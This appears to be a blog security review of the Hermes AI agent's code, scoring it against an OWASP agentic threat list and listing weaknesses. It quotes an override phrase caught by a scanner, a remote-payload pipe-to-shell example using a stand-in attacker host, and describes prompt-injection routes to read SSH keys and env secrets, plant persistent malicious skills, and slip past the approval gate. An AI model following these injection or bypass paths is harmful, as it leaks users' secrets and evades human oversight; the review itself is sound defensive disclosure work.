Review · Inside the Code

Hermes Agent Technical Review: Safety via Transparency

Hermes is one of the most architecturally interesting AI agents I've reviewed this year. The maintainers chose a bold philosophy: 'Safety via Transparency'. But is transparency actually a safety control? I took it line-by-line through the OWASP Top 10 for LLM Agents to find out.

The video version · same thesis, looser edits

Review Date: April 2026 Reviewer: TechDad Scope: Open-source code and public documentation only. No systems accessed or exploited. All findings are for educational purposes. Repository: https://github.com/nousresearch/hermes-agent


Executive Summary

The Hermes Agent exhibits a strong security posture out-of-the-box. The architecture reflects a defense-in-depth approach, deploying guardrails specifically tailored against agentic vulnerabilities. Hermes emphasizes human-in-the-loop validation over complete isolation for operational capabilities.

Unlike agents that run entirely in isolated containers, Hermes Agent’s built-in tools have direct system-level access to your machine. It protects your system using a human-in-the-loop approval gate for dangerous commands, rather than relying on a restrictive sandbox.

Things I Like

  • Full host access paired with a human-in-the-loop approval gate
  • Subagents properly leashed with zero persistent memory
  • Real supply chain paranoia — MCP descriptions are actively scanned and injection strings blocked
  • Aggressive secret-redaction engine covering 35+ token prefixes
  • MAX_DEPTH = 2 hardcoded to kill runaway swarms

Things I Don’t Like

  • Silent approval bypass in batch/cron/non-interactive contexts
  • Display-only redaction — tokens still hit the LLM provider in plaintext
  • No private vulnerability reporting channel, despite SECURITY.md asking researchers to report privately
  • SECURITY.md “Out of Scope” section scopes real threats away rather than acknowledging them
  • Container backends with mounted host volumes bypass all approval checks

Bottom line: The code is genuinely more secure than the SECURITY.md suggests. The approval gate, redaction engine, subagent constraints, and supply-chain audits are well-implemented. The documentation is where the structural gap lives.


Architecture — “Safety via Transparency”

Most AI agents choose Safety via Inability — they lock the agent in a container where it can’t break anything, but consequently it can’t accomplish much either. Hermes chooses Safety via Transparency. It grants full system access but places a “human-in-the-loop” glass wall right in front of destructive executions.

Host-Level Default vs. Sandbox

  • Host-level Default: By default (terminal.backend: local), the agent’s core tools (terminal, read_file, write_file, patch) run directly on the host with the same permissions as the user who started the process. (Source: hermes_cli/config.py:377)
  • Approval vs. Sandbox: Hermes does not rely on sandboxes to protect the host machine from the agent’s built-in tools. It relies on an Approval Gate (tools/approval.py). When a command matches destructive patterns, the agent pauses and asks the operator for permission. (Source: tools/approval.pyDANGEROUS_PATTERNS and check_all_command_guards)
  • Where Sandboxes Are Used: The only default sandboxes are for LLM-written code (execute_code tool) and third-party MCP servers. (Source: tools/code_execution_tool.py)

Agent Skills — Acquisition & Trust

  • Third-Party Skills (human-gated): Skills downloaded from the community marketplace (agentskills.io) require the /skills slash command. They pass through “Skills Guard” (security audit) and demand explicit confirmation. The agent has no tool to bypass this. (Source: hermes_cli/skills_hub.py, tools/skills_guard.py)
  • Self-Created Skills (agent-autonomous): The agent can write its own SKILL.md files into ~/.hermes/skills/ via file-writing tools. This is the “closed learning loop” — it writes what it learned so it remembers next time. (Source: tools/file_tools.py) ⚠️ This creates a trust asymmetry covered in F-06 below.

Capability Footprint

Because the architecture relies on an Approval Gate as its primary perimeter, Hermes retains massive capabilities:

  1. Unrestricted Native Access: Docker management, Python execution, git ops, infrastructure deploys — limited only by the operator’s shell permissions. (Source: tools/terminal_tool.py)
  2. Extensive Toolset & MCP Integration: 40+ native tools (browser, web research) plus hundreds of open-source MCP servers. Sandboxing is applied to the MCP server itself, not to the agent’s ability to query it. (Source: tools/mcp_tool.py:194_build_safe_env())
  3. Procedural Memory: The agent autonomously creates persistent SKILL.md workflows from host interactions.

Design Philosophy: Trust the Operator completely, but distrust code generated by the LLM and code pulled from the internet.


OWASP Top 10 for Agentic Applications — Scorecard

IDThreatResult
ASI01Agent Goal Hijack✅ Strong Mitigation
ASI02Tool Misuse✅ Strong Mitigation
ASI03Identity & Privilege Abuse🟡 Moderate / Acceptable Risk
ASI04Supply Chain Vulnerabilities✅ Advanced Mitigation
ASI05Unexpected Code Execution (RCE)✅ Advanced Mitigation
ASI06Memory & Context Poisoning✅ Strong Mitigation
ASI07Insecure Inter-Agent Communication✅ Inherently Secure
ASI08Cascading Failures✅ Strong Mitigation
ASI09Human-Agent Trust Exploitation✅ Advanced Mitigation
ASI10Rogue Agents✅ Strong Mitigation

ASI01 — Agent Goal Hijack

Threat: Attackers manipulate the agent’s core instructions to redirect its goal via prompt manipulation.

  • Subagents (tools/delegate_tool.py) are strictly sandboxed. Their system prompts are locked dynamically (_build_child_system_prompt) using the explicit delegation context, giving malicious inputs zero leverage over the parent’s core goal.
  • Subagents are denied access to sensitive toolsets. (Source: tools/delegate_tool.py:32DELEGATE_BLOCKED_TOOLS = frozenset(["delegate_task", "clarify", "memory", "send_message", "execute_code"]))

ASI02 — Tool Misuse

Threat: Functions manipulated for unintended system impacts.

  • Destructive operations require CLI / Gateway HITL validation. Arbitrary file wipes or configuration changes cannot execute automatically. (Source: tools/approval.py)
  • registry.py separates tools into discrete toolsets, enforcing least-privilege per role. (Source: tools/registry.py)

ASI03 — Identity and Privilege Abuse

Threat: Agent leveraged to impersonate users or escalate privileges.

  • Subagents inherit parent LLM credentials (api_key) but not full system access when restrictive toolsets are passed.
  • TerminalTool processes run as the host user. Hermes relies on env scoping (stripping dangerous keys for MCP servers) and the Approval Gate to prevent raw privilege escalation. (Source: tools/mcp_tool.py_CREDENTIAL_PATTERN)

ASI04 — Supply Chain Vulnerabilities

Threat: External dependencies or model registries inject malicious behavior.

  • tools/mcp_tool.py includes _scan_mcp_description which parses external MCP server descriptions. (Source: tools/mcp_tool.py:253)
  • It actively detects and logs prompt injection strings (e.g., "ignore previous instructions", "<system>") from external supply chains.

ASI05 — Unexpected Code Execution (RCE)

Threat: Agent executes injected host-level commands.

  • tools/approval.py evaluates commands against DANGEROUS_PATTERNS regex heuristics (rm -rf, chmod 777, reverse shells).
  • tirith_security pipelines + a “smart block” auxiliary LLM catch obfuscated RCE attempts. (Source: tools/approval.py_smart_approve())

ASI06 — Memory & Context Poisoning

Threat: Exploiting memory retrieval to inject biases or backdoor context.

  • Context traces in hermes_state.py (SQLite SessionDB) are rigidly partitioned by session_id, preventing cross-user bleed.
  • Subagents boot with skip_memory=True. (Source: tools/delegate_tool.py:366)

ASI07 — Insecure Inter-Agent Communication

Threat: AI swarms over cleartext IPC allowing MITM.

  • Inter-agent coordination runs exclusively via in-memory ThreadPoolExecutor.
  • Responses return directly to the parent as string schemas. No network hops.

ASI08 — Cascading Failures

Threat: Agentic loops triggering DoS or massive API bills.

  • Hard caps universally enforced: subagent max_iterations, MCP auto-sampling max_tool_rounds (default 5). (Source: run_agent.py, tools/mcp_tool.py)

ASI09 — Human-Agent Trust Exploitation

Threat: Malicious commands masked in benign workflows to trick the user.

  • tools/approval.py enforces explicit consent paired with _smart_approve context — it explains why a command is risky, reducing blind approvals.

ASI10 — Rogue Agents

Threat: Agents operating independently outside lifecycle limits.

  • Swarm explosion neutralized via MAX_DEPTH = 2. A parent can spawn a child, but a child cannot spawn a grandchild. (Source: tools/delegate_tool.py:53)

Five Deliberate Security Boundaries

Beyond the OWASP standards, Hermes bakes five additional boundaries directly into its architecture.

1. “Display-Only” Secret Redaction (agent/redact.py)

A multi-layered redaction engine prevents accidental credential leaks.

  • Tool-output level: terminal_tool.py:1505, file_tools.py:390, code_execution_tool.py:862 call redact_sensitive_text() before results enter the LLM context or display.
  • Log level: All file/console loggers use RedactingFormatter (hermes_logging.py:226, gateway/run.py:9737) — secrets never reach log files.
  • Coverage: 35+ token prefixes (OpenAI, GitHub, Slack, AWS, Stripe, HuggingFace), env assignments, JSON fields, Authorization headers, JWTs, Telegram bot tokens, private key blocks, DB connection strings, Discord snowflake IDs, phone numbers. (Source: agent/redact.py:21-113 patterns; agent/redact.py:124 entry point)

⚠️ Caveat: See F-04 — the redactor operates at the display layer only. Underlying values still enter the LLM context.

2. Sandboxed Python & Filtered Env Vars

When the agent writes its own Python scripts and runs them via execute_code, the child process strips all API keys and tokens. The env filter excludes anything containing KEY, TOKEN, SECRET, PASSWORD, CREDENTIAL, PASSWD, or AUTH. Only safe prefixes pass through (PATH, HOME, LANG, etc.). The script can only call tools via RPC over a Unix domain socket. (Source: tools/code_execution_tool.py:993-1022_SAFE_ENV_PREFIXES / _SECRET_SUBSTRINGS)

For third-party MCP servers, _build_safe_env() passes through only 8 baseline vars (PATH, HOME, USER, LANG, LC_ALL, TERM, SHELL, TMPDIR) plus XDG_*, preventing a malicious NPM/UV package from scraping ~/.hermes/.env. (Source: tools/mcp_tool.py:170-210)

3. Strict Subagent Leashing (tools/delegate_tool.py)

  • No access to persistent cross-session memory (skip_memory=True). (Source: tools/delegate_tool.py:366)
  • Delegation depth hardcoded to 2. (Source: tools/delegate_tool.py:53)
  • Delegation tool is removed from the child’s toolset. (Source: DELEGATE_BLOCKED_TOOLS)

4. Supply Chain Auto-Audits

The CI pipeline auto-blocks PRs containing common ML supply chain attack payloads — hidden .pth model weights, base64-wrapped exec() loaders. (Source: .github/workflows/supply-chain-audit.yml:38 — checks $BASE..$HEAD for /\.pth$/ and base64 decoders on Python startup)

5. SSRF Protections (Tools + Gateway)

Hermes connects to 18+ external platforms (Slack, WhatsApp, Discord, etc.). Both the tool layer and gateway adapters enforce SSRF protections. is_safe_url() resolves hostnames and blocks:

  • Private, loopback, link-local, reserved, multicast, and CGNAT ranges
  • Cloud metadata hostnames (metadata.google.internal)
  • Fails closed on DNS errors or unexpected exceptions

(Source: tools/url_safety.py:51 defines is_safe_url(); called from tools/browser_tool.py:1332, tools/web_tools.py:1230,1553,1647, tools/vision_tools.py:100,159, and gateway adapters: gateway/platforms/base.py:390,509, telegram.py:1751, discord.py:1348, slack.py:651, mattermost.py:409, matrix.py:874, feishu.py:2450, wecom.py:1002, weixin.py:1598, qqbot.py:1021)


Residual Risks & Structural Gaps

IDTitleSeverityCategory
F-01SECURITY.md exclusions dismiss valid attack vectorsInformationalGovernance
F-02Silent approval bypass in non-interactive contextsMediumAuthorization
F-03Container backends bypass approval with mounted volumesLowAuthorization
F-04Redaction is display-only; secrets sent to LLM providersMediumData Leakage
F-05Permanent allowlist approves entire pattern categoriesLowAuthorization
F-06Self-created skills bypass Skills Guard auditInformationalTrust Model
F-07Fragmented security reporting guidelines and missing SLAInformationalGovernance

F-01: SECURITY.md “Out of Scope” Contains Self-Serving Exclusions

Severity: Informational / Governance Risk Location: SECURITY.md:50-58 (Section 3: “Out of Scope”)

The “Out of Scope” section preemptively dismisses several categories of findings legitimate researchers would consider valid. Several exclusions cross from “reasonable scoping” into “redefining risk away.”

F-01a: Prompt Injection Dismissed Unless It Bypasses Approval Gate

“Prompt Injection: Unless it results in a concrete bypass of the approval system, toolset restrictions, or container sandbox.”SECURITY.md:53

This sets an unreasonably high bar. A prompt injection that convinces the agent to:

  • Exfiltrate ~/.hermes/memory/MEMORY.md contents into its response (sent to a third-party LLM API)
  • Read and summarize ~/.hermes/.env contents in natural language (bypassing regex redaction)
  • Use read_file to access ~/.ssh/id_rsa and encode it in a way the redactor doesn’t catch

…would not qualify under this definition, because none bypass the approval system. The approval gate governs terminal commands, not read_file or the agent’s own responses.

Impact: Data exfiltration via prompt injection is a real attack vector explicitly excluded.

F-01b: “Default Behavior Is Not a Vulnerability”

“Host-level command execution when terminal.backend is set to local — this is the documented default, not a vulnerability.”SECURITY.md:56

This conflates “intentional” with “secure.” Documenting a risk does not eliminate the risk. A researcher demonstrating the agent running curl attacker.com/payload | bash through a crafted prompt would be told “that’s by design” — even though the dangerous pattern for this exact case exists at tools/approval.py:98:

(r'\b(curl|wget)\b.*\|\s*(ba)?sh\b', "pipe remote content to shell"),

The approval gate should catch this, but the documentation preemptively absolves the project even if it doesn’t.

F-01c: Tool-Level Access Restrictions Waved Away

“Reports that a specific tool (e.g., read_file) can access a resource are not vulnerabilities if the same access is available through terminal.”SECURITY.md:58

This is a “weakest link” argument in reverse. Instead of “we should apply consistent restrictions across all access paths,” it says “since terminal is wide open, nothing else matters.” This dismisses defense-in-depth entirely.

F-01d: Break-Glass Settings Pre-Absolved

“Intentional break-glass settings such as approvals.mode: "off" or terminal.backend: local in production.”SECURITY.md:57

terminal.backend: local is the default (hermes_cli/config.py:377), not a break-glass setting. Listing it alongside approvals.mode: "off" conflates two very different risk levels. A first-time user who never touches config.yaml is running in local mode — that’s not a conscious break-glass decision.

F-02: Silent Approval Bypass in Non-Interactive Contexts

Severity: Medium Location: tools/approval.py:619-622

if not is_cli and not is_gateway:
    return {"approved": True, "message": None}

When the agent runs outside both CLI (HERMES_INTERACTIVE unset) and gateway (HERMES_GATEWAY_SESSION unset) contexts, all dangerous command checks are silently bypassed. This affects:

  • batch_runner.py (parallel batch processing)
  • environments/ (RL training / Atropos)
  • Any programmatic AIAgent usage that doesn’t set the env vars
  • Cron jobs (cron/scheduler.py)

Impact: An attacker who can influence prompts in batch or cron contexts can execute arbitrary destructive commands with zero approval. The same bypass exists in check_all_command_guards() at tools/approval.py:719-720.

Recommendation: Non-interactive contexts should default to deny for dangerous commands, not silent approval. Users wanting unguarded batch execution can opt in via approvals.mode: off.

F-03: Container Backends Bypass All Approval Checks

Severity: Low (Intentional Design, Undocumented Assumption) Location: tools/approval.py:602-603 and 704-705

if env_type in ("docker", "singularity", "modal", "daytona"):
    return {"approved": True, "message": None}

When using container backends, the approval gate is completely disabled — the agent can run rm -rf / or DROP DATABASE without prompting.

The implicit assumption: “the container is disposable.” Valid for ephemeral containers, not for containers with:

  • Mounted host volumes (terminal.docker_volumes, terminal.docker_mount_cwd_to_workspace)
  • Persistent filesystems (terminal.container_persistent: Truethe default)
  • SSH backends are correctly NOT bypassed (env_type == "ssh" excluded)

A docker_volumes: ["/home/user/projects:/workspace"] mount + a destructive in-container command would delete real host files with zero approval.

Recommendation: If docker_volumes is non-empty or docker_mount_cwd_to_workspace is true, downgrade the container bypass to a warning.

F-04: Redaction Layer Operates on Display Only — Not on LLM Context

Severity: Medium Location: agent/redact.py (as documented in SECURITY.md:34)

“Redaction operates on the display layer only — underlying values remain intact for internal agent operations.”

SECURITY.md states this correctly but doesn’t address the implication: secrets passing through the agent’s conversation context are sent to the LLM provider in plaintext. If the agent reads ~/.hermes/.env via read_file or terminal cat ~/.hermes/.env, the full contents (API keys, tokens) are:

  1. Stored in the messages table of state.db (unencrypted SQLite)
  2. Sent to the LLM provider API in the next request
  3. Potentially logged by the provider

The redaction layer hides secrets from the human on their screen, but doesn’t prevent the secrets from leaving the machine. This is a data exfiltration path — not via a network attacker, but via the LLM provider itself.

Recommendation: Tool-level input redaction (before content enters message history) for known secret paths: ~/.hermes/.env, ~/.ssh/*, ~/.aws/credentials.

F-05: command_allowlist Enables Permanent Approval Bypass Persistence

Severity: Low Location: tools/approval.py:360-368, hermes_cli/config.py:735

When a user approves a dangerous command with [a]lways, the pattern key is saved to config.yaml under command_allowlist. This is loaded at module import (tools/approval.py:957) and persists across sessions, profiles, and reboots.

The command_allowlist stores human-readable description strings (e.g., "recursive delete", "shell command via -c/-lc flag"), not specific commands. Approving bash -c "echo hello" once with [a]lways permanently approves all commands matching the "shell command via -c/-lc flag" pattern — including bash -c "rm -rf /".

Evidence:

# tools/approval.py:196-197
pattern_key = description  # e.g., "shell command via -c/-lc flag"
return (True, pattern_key, description)

Recommendation: The [a]lways prompt should warn it approves an entire category of commands. Consider storing command-specific hashes instead of pattern keys.

F-06: Self-Created Skills Have Equivalent Trust to Installed Skills

Severity: Informational Location: tools/skills_tool.py, agent/skill_commands.py

Skills the agent creates autonomously (via write_file to ~/.hermes/skills/) receive the same trust level as skills the human explicitly installed via the Skills Hub with Skills Guard audit. There is no distinction in the loading path — all SKILL.md files under ~/.hermes/skills/ are loaded equally.

If the agent is manipulated via prompt injection to create a malicious skill (e.g., containing instructions to exfiltrate data on every future session), that skill loads in all subsequent conversations without audit or user awareness. Skills Guard only runs during /skills install, not during write_file to the skills directory.

Recommendation: A “self-created” flag in skill frontmatter that triggers a one-time confirmation prompt when the skill is first loaded in a new session.

F-07: Fragmented Security Reporting Guidelines and Missing SLA

Severity: Informational / Governance Risk Location: CONTRIBUTING.md:646, SECURITY.md:80-85

  1. Disconnected Guidelines: CONTRIBUTING.md instructs users to “report privately” for security vulnerabilities but provides no instructions on how and does not link to SECURITY.md. A contributor looking only at CONTRIBUTING.md has no actionable path.
  2. Missing SLA: SECURITY.md defines a 90-day Coordinated Vulnerability Disclosure window before publication but lacks an initial-response SLA (e.g., “We will acknowledge receipt within 72 hours”). Without an SLA, researchers assume reports were ignored and publish early out of frustration.

Recommendation: Update CONTRIBUTING.md to link SECURITY.md. Add a 48–72 hour initial-response SLA to the Disclosure Process.


Issue Tracker Signals

A fair amount of signal can be derived just by looking at the public issue tracker.

  • ~1,700+ open issues against a fast-moving project — triage is fundamentally losing the battle against shipping velocity.
  • 9 releases in 5 weeks — the maintainers are shipping hard while carrying a massive capability footprint.
  • Issue #11430 — per-user memory isolation in group chats: complicates the strong claim of session-level sandboxing (see ASI06). Group-chat scenarios are a legitimate multi-tenant-like context the current partitioning model wasn’t designed for.
  • Issue #11431 — oversized toolsets drag subagents to a crawl: creates unintentional denial-of-service loops inside the delegation subsystem. Worth watching as a soft-cap analogue to ASI08.

None of these are individually damning, but they do indicate that the gap between documented security posture and lived operational reality is widening.

Issue numbers and counts are approximate as of the review date and will drift. Readers should consult the live tracker.


Repository Hygiene (Non-Security)

Strictly non-security, but worth flagging for contributors:

  • The repo has ~14 loose Python files sitting directly at the repo root, making it hard to parse the project boundary at first glance.
  • Nothing is fundamentally broken. The repository has grown organically. Modules inside tools/, agent/, and gateway/ have very clear responsibilities.
  • A ~30-minute hygiene pass would materially lower onboarding cost for new contributors:
    • Move loose Python scripts into a proper package
    • Consolidate to a single packaging canon (pyproject.toml as the single source of truth)

What I Would Tighten

Concrete, prioritized recommendations:

  1. Non-interactive contexts must default to deny. Change F-02’s silent bypass to an explicit deny. Let operators opt into unguarded batch via approvals.mode: off.
  2. Scrub secrets before they hit the database. Tool-level input redaction for known-sensitive paths (~/.hermes/.env, ~/.ssh/*, ~/.aws/credentials) to close F-04’s provider-logging exfiltration path.
  3. Auxiliary-LLM “intent capsule” re-validation. Periodically re-assert the current command stack against the original system prompt payload (strengthens ASI01/ASI03).
  4. Warn on [a]lways approvals. Make it crystal clear when an approval covers an entire regex category, not just the visible command (F-05).
  5. Flag self-created skills at first load. A one-time confirmation prompt when a freshly-authored skill is loaded into a new session (F-06).
  6. Private vulnerability reporting channel. A real security email or PGP key with a 48–72 hour acknowledgement SLA (F-07).
  7. Honest SECURITY.md scoping. Replace “Out of Scope” exclusions with acknowledged residual risks. The code is strong enough to stand on that honesty.

Final Verdict

The Hermes Agent proves that Safety via Transparency is a viable architecture. The approval gate, redaction engine, subagent constraints, and supply-chain audits are genuinely well-implemented. This is a masterclass in modern AI agent engineering.

It just deserves to have the residual risks acknowledged in documentation, not scoped away.

More in Inside the Code